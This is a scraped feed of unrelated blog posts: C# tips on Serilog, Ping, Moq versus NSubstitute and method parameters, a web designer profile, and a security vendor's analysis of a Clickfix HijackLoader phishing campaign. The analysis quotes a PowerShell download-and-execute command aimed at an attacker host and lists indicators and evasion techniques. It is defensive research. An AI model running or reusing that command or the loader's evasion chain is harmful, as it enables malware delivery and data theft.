    Serilog logs with a simple theme

    So, just by updating the AppSettings file, you can fine-tune the behavior and the output of the logger. In this way, you can customize Release builds to update the AppSettings file and define custom properties for every deploy environment.

    Further reading

    If you want to learn more about the different topics discussed in this article:

    🔗 Serilog Structured Data | Code4IT

    🔗 Serilog Console Sink | GitHub

    🔗 How to integrate Serilog and Seq | Code4IT

    Wrapping up

    In this article, we’ve seen how to integrate Serilog in a .NET application to print the logs on the application Console.

    Time to recap the key points:

    • install the Serilog, Serilog.AspNetCore, and Serilog.Extensions.Logging NuGet packages to integrate the basic functionalities of Serilog
    • download the Serilog.Sinks.Console and Serilog.Sinks.Async NuGet packages to use the Console as a destination of your logs
    • update the Program class to specify that the application must use Serilog
    • use ILogger<T> instead of Serilog.ILogger
    • define the settings in the appsettings.json file instead of directly in the code

    Finally, if you want to see the full example, here’s the GitHub repository used for this article

    Happy coding!

    🐧



    Source link

  • C# Tip: use the Ping class instead of an HttpClient to ping an endpoint

    C# Tip: use the Ping class instead of an HttpClient to ping an endpoint


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    What if you wanted to see if a remote website is up and running?

    Probably, the first thing that may come to your mind is to use a common C# class: HttpClient. But it may cause you some trouble.

    There is another way to ping an endpoint: using the Ping class.

    Why not using HttpClient

    Say that you need to know if the host at code4it.dev is live. With HttpClient you might use something like this:

    async Task Main()
    {
        var url = "https://code4it.dev";
    
        var isUp = await IsWebsiteUp_Get(url);
    
        Console.WriteLine("The website is {0}", isUp ? "up" : "down");
    }
    
    private async Task<bool> IsWebsiteUp_Get(string url)
    {
        var httpClient = new HttpClient(); // yes, I know, I should use HttpClientFactory!
        var httpResponse = await httpClient.GetAsync(url);
        return httpResponse.IsSuccessStatusCode;
    }
    

    There are some possible issues with this approach: what if there is no resource available in the root? You will have to define a specific path. And what happens if the defined resource is under authentication? IsWebsiteUp_Get will always return false. Even when the site is correctly up.

    Also, it is possible that the endpoint does not accept HttpGet requests. So, we can use HttpHead instead:

    private async Task<bool> IsWebsiteUp_Head(string url)
    {
        var httpClient = new HttpClient();
        HttpRequestMessage request = new HttpRequestMessage
        {
            RequestUri = new Uri(url),
            Method = HttpMethod.Head // Not GET, but HEAD
        };
        var result = await httpClient.SendAsync(request);
        return result.IsSuccessStatusCode;
    }
    

    We have the same issues described before, but at least we are not bound to a specific HTTP verb.

    By the way, we need to find another way.

    How to use Ping

    By using the Ping class, we can get rid of those checks and evaluate the status of the Host, not of a specific resource.

    private async Task<bool> IsWebsiteUp_Ping(string url)
    {
        Ping ping = new Ping();
        var hostName = new Uri(url).Host;
    
        PingReply result = await ping.SendPingAsync(hostName);
        return result.Status == IPStatus.Success;
    }
    

    The Ping class comes in the System.Net.NetworkInformation namespace, and allows you to perform the same operations of the ping command you usually send via command line.

    Conclusion

    We’ve seen why you should use Ping instead of HttpClient to perform a ping-like operation.

    There’s more than this: head to this more complete article to learn more.

    👉 Let’s discuss it on Twitter or on the comment section below.

    🐧





    Source link

  • syntax cheat sheet | Code4IT


    Moq and NSubstitute are two of the most used library to mock dependencies on your Unit Tests. How do they differ? How can we move from one library to the other?

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When writing Unit Tests, you usually want to mock dependencies. In this way, you can define the behavior of those dependencies, and have full control of the system under test.

    For .NET applications, two of the most used mocking libraries are Moq and NSubstitute. They allow you to create and customize the behavior of the services injected into your classes. Even though they have similar functionalities, their syntax is slightly different.

    In this article, we will learn how the two libraries implement the most used functionalities; in this way, you can easily move from one to another if needed.

    A real-ish example

    As usual, let’s use a real example.

    For this article, I’ve created a dummy class, StringsWorker, that does nothing but call another service, IStringUtility.

    public class StringsWorker
    {
        private readonly IStringUtility _stringUtility;
    
        public StringsWorker(IStringUtility stringUtility)
            => _stringUtility = stringUtility;
    
        public string[] TransformArray(string[] items)
            => _stringUtility.TransformAll(items);
    
        public string[] TransformSingleItems(string[] items)
            => items.Select(i => _stringUtility.Transform(i)).ToArray();
    
        public string TransformString(string originalString)
            => _stringUtility.Transform(originalString);
    }
    

    To test the StringsWorker class, we will mock its only dependency, IStringUtility. This means that we won’t use a concrete class that implements IStringUtility, but rather we will use Moq and NSubstitute to mock it, defining its behavior and simulating real method calls.

    Of course, to use the two libraries, you have to install them in each tests project.

    How to define mocked dependencies

    The first thing to do is to instantiate a new mock.

    With Moq, you create a new instance of Mock<IStringUtility>, and then inject its Object property into the StringsWorker constructor:

    private Mock<IStringUtility> moqMock;
    private StringsWorker sut;
    
    public MoqTests()
    {
        moqMock = new Mock<IStringUtility>();
        sut = new StringsWorker(moqMock.Object);
    }
    

    With NSubstitute, instead, you declare it with Substitute.For<IStringUtility>() – which returns an IStringUtility, not wrapped in any class – and then you inject it into the StringsWorker constructor:

    private IStringUtility nSubsMock;
    private StringsWorker sut;
    
    public NSubstituteTests()
    {
        nSubsMock = Substitute.For<IStringUtility>();
        sut = new StringsWorker(nSubsMock);
    }
    

    Now we can customize moqMock and nSubsMock to add behaviors and verify the calls to those dependencies.

    Define method result for a specific input value: the Return() method

    Say that we want to customize our dependency so that, every time we pass “ciao” as a parameter to the Transform method, it returns “hello”.

    With Moq we use a combination of Setup and Returns.

    moqMock.Setup(_ => _.Transform("ciao")).Returns("hello");
    

    With NSubstitute we don’t use Setup, but we directly call Returns.

    nSubsMock.Transform("ciao").Returns("hello");
    

    Define method result regardless of the input value: It.IsAny() vs Arg.Any()

    Now we don’t care about the actual value passed to the Transform method: we want that, regardless of its value, the method always returns “hello”.

    With Moq, we use It.IsAny<T>() and specify the type of T:

    moqMock.Setup(_ => _.Transform(It.IsAny<string>())).Returns("hello");
    

    With NSubstitute, we use Arg.Any<T>():

    nSubsMock.Transform(Arg.Any<string>()).Returns("hello");
    

    Define method result based on a filter on the input: It.Is() vs Arg.Is()

    Say that we want to return a specific result only when a condition on the input parameter is met.

    For example, every time we pass a string that starts with “IT” to the Transform method, it must return “ciao”.

    With Moq, we use It.Is<T>(func) and we pass an expression as an input.

    moqMock.Setup(_ => _.Transform(It.Is<string>(s => s.StartsWith("IT")))).Returns("ciao");
    

    Similarly, with NSubstitute, we use Arg.Is<T>(func).

    nSubsMock.Transform(Arg.Is<string>(s => s.StartsWith("IT"))).Returns("ciao");
    

    Small trivia: for NSubstitute, the filter is of type Expression<Predicate<T>>, while for Moq it is of type Expression<Func<TValue, bool>>: don’t worry, you can write them in the same way!

    Throwing exceptions

    Since you should test not only happy paths, but even those where an error occurs, you should write tests in which the injected service throws an exception, and verify that that exception is handled correctly.

    With both libraries, you can throw a generic exception by specifying its type:

    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws<ArgumentException>();
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws<ArgumentException>();
    

    You can also throw a specific exception instance – maybe because you want to add an error message:

    var myException = new ArgumentException("My message");
    
    //Moq
    moqMock.Setup(_ => _.TransformAll(null)).Throws(myException);
    
    //NSubstitute
    nSubsMock.TransformAll(null).Throws(myException);
    

    If you don’t want to handle that exception, but you want to propagate it up, you can verify it in this way:

    Assert.Throws<ArgumentException>(() => sut.TransformArray(null));
    

    Verify received calls: Verify() vs Received()

    Sometimes, to understand if the code follows the execution paths as expected, you might want to verify that a method has been called with some parameters.

    To verify it, you can use the Verify method on Moq.

    moqMock.Verify(_ => _.Transform("hello"));
    

    Or, if you use NSubstitute, you can use the Received method.

    nSubsMock.Received().Transform("hello");
    

    Similar as we’ve seen before, you can use It.IsAny, It.Is, Arg.Any and Arg.Is to verify some properties of the parameters passed as input.

    Verify the exact count of received calls

    Other times, you might want to verify that a method has been called exactly N times.

    With Moq, you can add a parameter to the Verify method:

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    moqMock.Verify(_ => _.Transform(It.IsAny<string>()), Times.Exactly(3));
    

    Note that you can specify different values for that parameter, like Time.Exactly, Times.Never, Times.Once, Times.AtLeast, and so on.

    With NSubstitute, on the contrary, you can only specify a defined value, added as a parameter to the Received method.

    sut.TransformSingleItems(new string[] { "a", "b", "c" });
    
    nSubsMock.Received(3).Transform(Arg.Any<string>());
    

    Reset received calls

    As you remember, the mocked dependencies have been instantiated within the constructor, so every test method uses the same instance. This may cause some troubles, especially when checking how many calls the dependencies have received (because the count of received calls accumulates for every test method run before). Therefore, we need to reset the count of the received calls.

    In NUnit, you can define a method that will run before any test method – but only if decorated with the SetUp attribute:

    [SetUp]
    public void Setup()
    {
      // reset count
    }
    

    Here we can reset the number of the recorded method invocations on the dependencies and make sure that our test methods use always clean instances.

    With Moq, you can use Invocations.Clear():

    [SetUp]
    public void Setup()
    {
        moqMock.Invocations.Clear();
    }
    

    While, with NSubstitute, you can use ClearReceivedCalls():

    [SetUp]
    public void Setup()
    {
        nSubsMock.ClearReceivedCalls();
    }
    

    Further reading

    As always, the best way to learn what a library can do is head to its documentation. So, here you can find the links to Moq and NSubstitute docs.

    🔗 Moq documentation | GitHub

    🔗 NSubstitute documentation | NSubstitute

    If you already use Moq but you are having some troubles testing and configuring IHttpClientFactory instances, I got you covered:

    🔗 How to test HttpClientFactory with Moq | Code4IT

    Finally, if you want to see the complete code of this article, you can find it on GitHub; I’ve written the exact same tests with both libraries so that you can compare them more easily.

    🔗 GitHub repository for the code used in this article | GitHub

    Conclusion

    In this article, we’ve seen how Moq and NSubstitute allow us to perform some basic operations when writing unit tests with C#. They are similar, but each one of them has a specific set of functionalities that are missing on the other library – or, at least, that I don’t know if they exist in both.

    Which library do you use, Moq or NSubstitute? Or maybe, another one?

    Happy coding!
    🐧



    Source link

  • Craft, Clarity, and Care: The Story and Work of Mengchu Yao

    Craft, Clarity, and Care: The Story and Work of Mengchu Yao


    Hi, I’m Mengchu Yao from Taiwan, and I am currently based in Tokyo, Japan, where I work as a web designer at baqemono.inc.

    I’m truly grateful to be able to pursue my design career in a cross-cultural environment. The life here allows me to appreciate small things and encourages me to stay curious and open minded.

    Featured Work

    Movie × AI model

    We created the website for AI model Inc., a company that leverages AI models and virtual personalities to offer digital transformation (DX) services. The site was created to showcase their AI video generation solutions.

    Personal notes

    This website design is centered around the concept of “natural and elegant AI-generated visuals”. One of the key challenges was to present a large number of dynamic, immersive visual elements and interactions within a single-page layout. We spent a lot of time finding the right balance between animation and delivering messages, ensuring that every motion looks beautiful and meaningful at the same time

    This was also time that I sketched the animation for almost every section myself, working closely with developers to fine-tune the motion expressions. The process was both challenging and fascinating, which is why it was rewarding and significant for my growth.

    Vlag yokohama

    We created the official website for “Vlag yokohama,” a new members-only creative lounge and workspace located on the top (42nd) floor of the THE YOKOHAMA FRONT at Yokohama Station.

    Personal notes

    This project was a rare opportunity that allowed me to explore and be creative while using the brand guidelines as a foundation, in response to the request “to use the Yokohama cityscape as the backbone of visuals while incorporating elements that evoke the feeling of wind and motion.”

    One thoughtful touch was the main visual on the homepage. It automatically changes during the time of day: morning, afternoon, and evening, which represents Yokohama’s ambiances and gives a subtle delight to the browsing experience.

    ANGELUX

    We created a brand-new corporate website for Angelux Co., Ltd., a company founded in 1987 that specializes in beauty salons and spas operations, with product development and sales in cosmetics.

    Personal notes

    This project began with the client’s request to clearly distinguish between the service website and the corporate site, and to position the latter as a recruitment platform that authentically reflects the people behind the brand.

    To embody Angelux’s strong emphasis on craftsmanship, we featured actual treatment scenes in the main visual. The overall design blends a sense of classic professionalism with a soft modern aesthetic, creating a calm and reassuring atmosphere. This approach not only helps build trust in the company but also effectively appeals to potential talent interested in joining Angelux.

    The visual design incorporated elements reminiscent of high-quality cosmetics that conveys the clean beauty and clarity of skincare.

    infordio

    We redesigned the official website for Infodio Inc., a company that specializes in advanced technologies such as AI-OCR and Natural Language Processing (NLP), and offers high-speed, automated transcription products and services.

    Personal notes

    The original website failed to effectively communicate “AI as core”, and often mislead the client’s applicants. To resolve the issue, our strategy was to emphesize the products. The revamp successfully gives the true essence of the brand and attracts the right potential talents with clear messaging.

    For the visuals, we started from scratch. It was challenging but also the most fun part. As the products were the focal point of the design, the key was to show both the authenticity and visual appeal.

    Background

    After getting my master’s degree in Information Design, I joined the Tokyo-based digital design studio, baqemono.inc., I have had the opportunity to lead several challenging and creatively fulfilling projects from the early stages of my career.

    These experiences have shaped me tremendously and deepened my passion for this field. Throughout this journey, the studio’s founder has remained the designer I admire the most — a constant source of inspiration whose presence reminds me to approach every project with both respect and enthusiasm.

    Design Philosophy

    A strong concept is your north star

    I believe every design should be built upon a clear and compelling core idea. Whenever I begin a project, I always ask myself: “What am I designing for?”

    Structure comes first

    Before diving into visuals, I make sure I spend enough time on wireframes and the overall structure.
If the content and hierarchy aren’t clearly defined at the start, the rest of the bits and pieces become noises that cloud judgment. A solid framework helps me stay focused and gives me room to refine the details.

    Listen to the discomfort in your gut

    Whenever I feel that something’s “not quite right”, I always know I’d have to come back to take another look because these subtle feelings often point to something important.
 I believe that as designers we should be honest with ourselves, take a pause to examine, and revise. Each small tweak is a step closer to your truth.

    You have to genuinely love it

    I also believe that every designer should love his/her own work so the work will bring its impact.
This isn’t just about aesthetics — it’s about fully owning the concept, the details, and the final outcome.

    Teamwork is everything

    No project is ever completed by me alone — it’s always the result of a team effort.
 I deeply respect every member involved, and I constantly ask myself: “What can I do to make the collaboration smoother for everyone?”

    Tools and Techniques

    • Photoshop
    • Figma
    • After Effects
    • Eagle

    Future goals

    My main goal for the year is to start building my portfolio website. I’ve been mainly sharing my work on social media, but as I’ve gained more hands-on experience and creative outputs over time, I realized that it’s important to have a dedicated space that fully reflects who I am as a designer today.

    Recently, I started to make some changes in my daily routine, such as better sleeping hours and becoming a morning person to be more focused and productive for my work. My mind is clearer, and my body feels great, just as if I’m preparing myself for the next chapter of my creative journey.

    Final Thoughts

    Giving someone advice is always a little tricky for me, but one phrase that has resonated deeply with me throughout my journey is: “Go slow to go fast”. Finding your own balance between creating and resting while continuing to stay passionate about life is, to me, the most important thing of all.

    Thank you so much for taking the time to read this. I hope you enjoyed the works and thoughts I’ve shared!

    A heartfelt thanks as well to Codrops and Manoela for inviting me to be part of this Designer Spotlight. Ever since I stepped into the world of web design, Codrops has been a constant source of inspiration, showing me so many amazing works and creators. I’m truly honored and grateful to be featured among them.

    Contact

    I’m always excited to connect with people to share ideas and explore new opportunities together.
If anything here speaks to you, feel free to reach out — I’d love to chat more and hear your thoughts!
    I also share updates on my latest projects from time to time on social media, so feel free to drop by and say hi 😊



    Source link

  • An Analysis of the Clickfix HijackLoader Phishing Campaign 

    An Analysis of the Clickfix HijackLoader Phishing Campaign 


    Table of Contents 

      • The Evolving Threat of Attack Loaders 
    • Technical Methodology and Analysis 
      • Initial Access and Social Engineering 
      • Multi-Stage Obfuscation and De-obfuscation 
      • Anti-Analysis Techniques 
    • Quick Heal \ Seqrite Protection 

     

    Introduction 

    With the evolution of cyber threats, the final execution of a malicious payload is no longer the sole focus of the cybersecurity industry. Attack loaders have emerged as a critical element of modern attacks, serving as a primary vector for initial access and enabling the covert delivery of sophisticated malware within an organization. Unlike simple payloads, loaders are engineered with a dedicated purpose: to circumvent security defenses, establish persistence, and create a favorable environment for the hidden execution of the final-stage malware. This makes them a more significant and relevant threat that demands focused analysis. 

    We have recently seen a surge in HijackLoader malware. It first emerged in the second half of 2023 and quickly gained attention due to its ability to deliver payloads and its interesting techniques for loading and executing them. It mostly appears as Malware-as-a-Service, which has been observed mainly in financially motivated campaigns globally.  

    HijackLoader has been distributed through fake installers, SEO-poisoned websites, malvertising, and pirated software/movie portals, which ensures a wide and opportunistic victim base. 

    Since June 2025, we have observed attackers using Clickfix  where it led unsuspecting victims to download malicious .msi installers that, in turn, resulted in HijackLoader execution. DeerStealer was observed being downloaded as the final executable on the victim’s machine then.  

    Recently, it has also been observed that TAG-150 has emerged with CastleLoader/CastleBot, while also leveraging external services such as HijackLoader as part of its broader Malware-as-a-Service ecosystem. 

    HijackLoader frequently delivers stealers and RATs while continuously refining its tradecraft. It is particularly notorious for advanced evasion techniques such as: 

    • Process doppelgänging with transacted sections 
    • Direct syscalls under WOW64 

    Since its discovery, HijackLoader has continuously evolved, presenting a persistent and rising threat to various industries. Therefore, it is critical for organizations to establish and maintain continuous monitoring for such loaders to mitigate the risk of sophisticated, multi-stage attacks. 

    Infection Chain 

    Infection Chain

    Technical Overview 

    The initial access starts with a CAPTCHA-based social engineering phishing campaign, which we have identified as Clickfix(This technique was seen to be used by attackers in June 2025 as well). 

    Fig1: CAPTCHA-Based Phishing Page for Social Engineering
    Fig2: HTA Dropper File for Initial Execution

     This HTA file serves as the initial downloader, leading to the execution of a PowerShell file.   

    Fig3: Initial PowerShell Loader Script

    Upon decoding the above Base64-encoded string, we obtained another PowerShell script, as shown below. 

    Fig4: First-Stage Obfuscated PowerShell Script

    The above decoded PowerShell script is heavily obfuscated, presenting a significant challenge to static analysis and signature-based detection. Instead of using readable strings and variables, it dynamically builds commands and values through complex mathematical operations and the reconstruction of strings from character arrays. 

    While resolving the above payload, we see it gets decoded into below command, which while still unreadable, can be fully de-obfuscated. 

    Fig5: Deobfuscation of the First stage obfuscated payload

    After full de-obfuscation, we see that the script attempts to connect to a URL to download a subsequent file.  

    iex ((New-Object System.Net.WebClient).DownloadString(‘https://rs.mezi[.]bet/samie_bower.mp3’))  

    When run in a debugger, this script returns an error, indicating it is unable to connect to the URL.  

    Fig6: Debugger View of Failed C2 Connection

    The file samie-bower.mp3 is another PowerShell script, which at over 18,000 lines is heavily obfuscated and represents the next stage of the loader. 

    Fig7: Mainstage PowerShell Loader (samie_bower.mp3)

    Through debugging, we observe that this PowerShell file performs numerous Anti-VM checks, including inspecting the number of running processes and making changes to the registry keys.  

    Fig8: Anti-Virtual Machine and Sandbox Evasion Checks

    These checks appear to specifically target and read VirtualBox identifiers to determine if the script is running in a virtualized environment. 

    While analyzing the script, we observed that the final payload resides within the last few lines, which is where the initial obfuscated loader delivers the final malicious command. 

    Fig9: Final execution

     The above gibberish variable declaration has been resolved; upon execution, it performs Base64 decoding, XOR operations, and additional decryption routines, before loading another PowerShell script that likely injects the PE file.  

    Fig10: Intermediate PowerShell Script for PE Injection
    Fig11: Base64-Encoded Embedded PE Payload

     

    Decoding this file reveals an embedded PE file, identifiable by its MZ header. 

    Fig12: Decoded PE File with MZ Header

    This PE file is a heavily packed .NET executable. 

    Fig13: Packed .NET Executable Payload

    The executable payload loads a significant amount of code, likely extracted from its resources section. 

    Fig14: In-Memory Unpacking of the .NET Executable

    Once unpacked, the executable payload appears to load a DLL file. 

    Fig15: Protected DLL Loaded In-Memory

    This DLL file is also protected, likely to prevent reverse engineering and analysis. 

    Fig16: DLL Protection Indicators

    HijackLoader has a history of using a multi-stage process involving an executable followed by a DLL. This final stage of the loader attempts to connect to a C2 server, from which an infostealer malware is downloaded. In this case, the malware attempts to connect to the URL below. 

    Fig17: Final C2 Server Connection Attempt

    While this C2 is no longer accessible, the connection attempt is consistent with the behavior of NekoStealer Malware.  This HijackLoader has been involved in downloading different stealer malware including Lumma as well. 

    Conclusion 

    Successfully defending against sophisticated loaders like HijackLoader requires shifting the focus from static, final-stage payloads to their dynamic and continuously evolving delivery mechanisms. By concentrating on detecting the initial access and intermediate stages of obfuscation, organizations can build more resilient defenses against this persistent threat. It is equally important to adopt a proactive approach across all layers, rather than focusing solely on the initial access or the final payload. The intermediate layers are often where attackers introduce the most significant changes to facilitate successful malware deployment. 

    IOCs: 

    • 1b272eb601bd48d296995d73f2cdda54ae5f9fa534efc5a6f1dab3e879014b57 
    • 37fc6016eea22ac5692694835dda5e590dc68412ac3a1523ba2792428053fbf4 
    • 3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df 
    • 782b07c9af047cdeda6ba036cfc30c5be8edfbbf0d22f2c110fd0eb1a1a8e57d 
    • 921016a014af73579abc94c891cd5c20c6822f69421f27b24f8e0a044fa10184 
    • e2b3c5fdcba20c93cfa695f0abcabe218ac0fc2d7bc72c4c3af84a52d0218a82 
    • 52273e057552d886effa29cd2e78836e906ca167f65dd8a6b6a6c1708ffdfcfd 
    • c03eedf04f19fcce9c9b4e5ad1b0f7b69abc4bce7fb551833f37c81acf2c041e 
    • D0068b92aced77b7a54bd8722ad0fd1037a28821d370cf7e67cbf6fd70a608c4 
    • 50258134199482753e9ba3e04d8265d5f64d73a5099f689abcd1c93b5a1b80ee 
    • hxxps[:]//1h[.]vuregyy1[.]ru/3g2bzgrevl[.]hta  
    • 91[.]212[.]166[.]51 
    • 37[.]27[.]165[.]65:1477 
    • cosi[.]com[.]ar 
    • hxxps[:]//rs[.]mezi[.]bet/samie_bower.mp3 
    • hxxp[:]//77[.]91[.]101[.]66/ 

    Quick Heal \ Seqrite Protection: 

    • Script.Trojan.49900.GC 
    • Loader.StealerDropperCiR 
    • Trojan.InfoStealerCiR 
    • Trojan.Agent 
    • BDS/511 

    MITRE Att&ck: 

    Tactic  Technique ID  Technique Name 
    Initial Access  T1566.002  Phishing: Spearphishing Link (CAPTCHA phishing page) 
    T1189  Drive-by Compromise (malvertising, SEO poisoning, fake installers) 
    Execution  T1059.001  Command and Scripting Interpreter: PowerShell 
    Defense Evasion  T1027  Obfuscated Files or Information (multi-stage obfuscated scripts) 
    T1140  Deobfuscate/Decode Files or Information (Base64, XOR decoding) 
    T1562.001  Impair Defenses: Disable or Modify Tools (unhooking DLLs) 
    T1070.004  Indicator Removal: File Deletion (likely used in staged loaders) 
    T1211  Exploitation for Defense Evasion (direct syscalls under WOW64) 
    T1036  Masquerading (fake extensions like .mp3 for PowerShell scripts) 
    Discovery  T1082  System Information Discovery (VM checks, registry queries) 
    T1497.001  Virtualization/Sandbox Evasion: System Checks 
    Persistence  T1547.001  Boot or Logon Autostart Execution: Registry Run Keys (registry tampering) 
    Persistence / Privilege Esc.  T1055  Process Injection (PE injection routines) 
    Command and Control (C2)  T1071.001  Application Layer Protocol: Web Protocols (HTTP/HTTPS C2 traffic) 
    T1105  Ingress Tool Transfer (downloading additional payloads) 
    Impact / Collection  T1056 / T1005  Input Capture / Data from Local System (info-stealer functionality of final payload) 

     

    Authors: 

    Niraj Lazarus Makasare 

    Shrutirupa Banerjiee 



    Source link

  • Don’t use too many method arguments &vert; Code4IT

    Don’t use too many method arguments | Code4IT


    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    Many times, we tend to add too many parameters to a function. But that’s not the best idea: on the contrary, when a function requires too many arguments, grouping them into coherent objects helps writing simpler code.

    Why? How can we do it? What are the main issues with having too many params? Have a look at the following snippet:

    void SendPackage(
        string name,
        string lastname,
        string city,
        string country,
        string packageId
        ) { }
    

    If you need to use another field about the address or the person, you will need to add a new parameter and update all the existing methods to match the new function signature.

    What if we added a State argument? Is this part of the address (state = “Italy”) or something related to the package (state = Damaged)?

    Storing this field in the correct object helps understanding its meaning.

    void SendPackage(Person person, string packageId) { }
    
    class Person {
        public string Name { get; set; }
        public string LastName { get; set; }
        public Address Address {get; set;}
    }
    
    class Address {
        public string City { get; set; }
        public string Country { get; set; }
    }
    

    Another reason to avoid using lots of parameters? To avoid merge conflicts.

    Say that two devs, Alice and Bob, are working on some functionalities that impact the SendPackage method. Alice, on her branch, adds a new param, bool withPriority. In the meanwhile, Bob, on his branch, adds bool applyDiscount. Then, both Alice and Bob merge together their branches on the main one. What’s the result? Of course, a conflict: the method now has two boolean parameters, and the order by which they are added to the final result may cause some troubles. Even more, because every call to the SendPackage method has now one (or two) new params, whose value depends on the context. So, after the merge, the value that Bob defined for the applyDiscount parameter might be used instead of the one added by Alice.

    Conclusion

    To recap, why do we need to reduce the number of parameters?

    • to give context and meaning to those parameters
    • to avoid errors for positional parameters
    • to avoid merge conflicts

    👉 Let’s discuss it on Twitter or on the comment section below!

    🐧





    Source link